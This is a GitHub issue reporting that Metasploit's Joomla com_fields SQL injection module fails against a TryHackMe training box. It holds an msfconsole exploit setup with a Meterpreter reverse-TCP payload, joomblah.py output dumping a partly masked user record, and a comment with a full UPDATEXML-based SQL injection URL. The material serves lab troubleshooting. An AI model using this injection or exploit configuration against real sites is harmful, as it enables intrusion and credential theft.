unix/webapp/joomla_comfields_sqli_rce - Error retrieving table prefix

cgranleese-r7 commented 4 years ago

Steps to reproduce

How'd you do it?

start msfconsole
search joomla type:exploit
use 2
set options
run

Yea, it failed and returned - Error retrieving table prefix

Were you following a specific guide/tutorial or reading documentation?

https://tryhackme.com/room/dailybugle

Expected behavior

What should happen? Return a reverse shell

kali@kali:~$ python ./joomblah.py http://10.10.180.131

    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jo.., 'jonah@....com', '$2y$10$0veO/JSFh4..', '', '']
  -  Extracting sessions from fb9j5_session

Current behavior

What happens instead? It returns Error retrieving table prefix

Metasploit version

Framework: 5.0.101-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outisde msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

``` [framework/ui/console] ActiveModule=exploit/unix/webapp/joomla_comfields_sqli_rce [unix/webapp/joomla_comfields_sqli_rce] WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=10.10.180.131 RPORT=80 VHOST= SSL=false Proxies= UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) HttpUsername= HttpPassword= HttpRawHeaders= DigestAuthIIS=true SSLVersion=Auto FingerprintCheck=true DOMAIN=WORKSTATION HttpClientTimeout= HttpPartialResponses=false HttpTrace=true HttpTraceHeadersOnly=false HttpTraceColors=red/blu HTTP::uri_encode_mode=hex-normal HTTP::uri_full_url=false HTTP::pad_method_uri_count=1 HTTP::pad_uri_version_count=1 HTTP::pad_method_uri_type=space HTTP::pad_uri_version_type=space HTTP::method_random_valid=false HTTP::method_random_invalid=false HTTP::method_random_case=false HTTP::version_random_valid=false HTTP::version_random_invalid=false HTTP::uri_dir_self_reference=false HTTP::uri_dir_fake_relative=false HTTP::uri_use_backslashes=false HTTP::pad_fake_headers=false HTTP::pad_fake_headers_count=0 HTTP::pad_get_params=false HTTP::pad_get_params_count=16 HTTP::pad_post_params=false HTTP::pad_post_params_count=16 HTTP::uri_fake_end=false HTTP::uri_fake_params_start=false HTTP::header_folding=false FileDropperDelay= TARGETURI=/ PAYLOAD=php/meterpreter/reverse_tcp LHOST=10.11.16.15 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true AutoLoadStdapi=true AutoVerifySession=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false ```

History

The following commands were ran during the session and before this issue occurred:

Collapse

``` 221 search joomla 222 use 9 223 options 224 set RHOSTS 10.10.180.131 225 options 226 run 227 set httptrace true 228 run 229 search joomla 230 search joomla type:exploit 231 use 2 232 options 233 set RHOSTS 10.10.180.131 234 ip a 235 set LHOST 10.11.16.15 236 options 237 run 238 search joomla 239 search joomla type:exploit 240 use 5 241 options 242 set RHOSTS 10.10.180.131 243 set USERNAME jonah 244 set LHOST 10.11.16.15 245 options 246 set TARGETuRI / 247 set PASSWORD ***** 248 run 249 set HTTPTRACE true 250 options 251 run 252 info -d 253 search joomla type:exploit 254 use 2 255 options 256 run 257 set HTTPTRACE true 258 run 259 edit 260 run 261 --version 262 version 263 debug ```

Errors

The following errors occurred before the issue occurred:

Collapse

``` [09/17/2020 05:47:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go - Errno::ENOENT No such file or directory - go [09/17/2020 05:47:14] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack('

Logs

The following logs were recorded before the issue occurred:

Collapse

``` Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack(' ntfea9000 = (pack('

Version/Install

The versions and install method of your Metasploit setup:

Collapse

``` Framework: 5.0.101-dev Ruby: ruby 2.7.0p0 (2019-12-25 revision 647ee6f091) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```

cgranleese-r7 commented 3 years ago

Hey future @cgranleese-r7 , we need an issue template filled out properly!

label-actions[bot] commented 3 years ago

When creating an issue, please ensure that the default issue template has been updated with the required details.

Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.

paulbauriegel commented 2 years ago

The problem could be that the Database on TryHackMe TO_BASE64 not knows. See http://10.10.147.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(2170,CONCAT(0x2e,0x6942465a70,(SELECT%20MID((IFNULL(CAST(TO_BASE64(table_name)%20AS%20CHAR),0x20)),1,22)%20FROM%20information_schema.tables%20order%20by%20update_time%20DESC%20LIMIT%201),0x5359595a48),4879))

TO_BASE64 was introduced with MySQL 5.6 on the box you have 5.5.64-MariaDB

Results in:

500 FUNCTION joomla.TO_BASE64 does not exist

rapid7 / metasploit-framework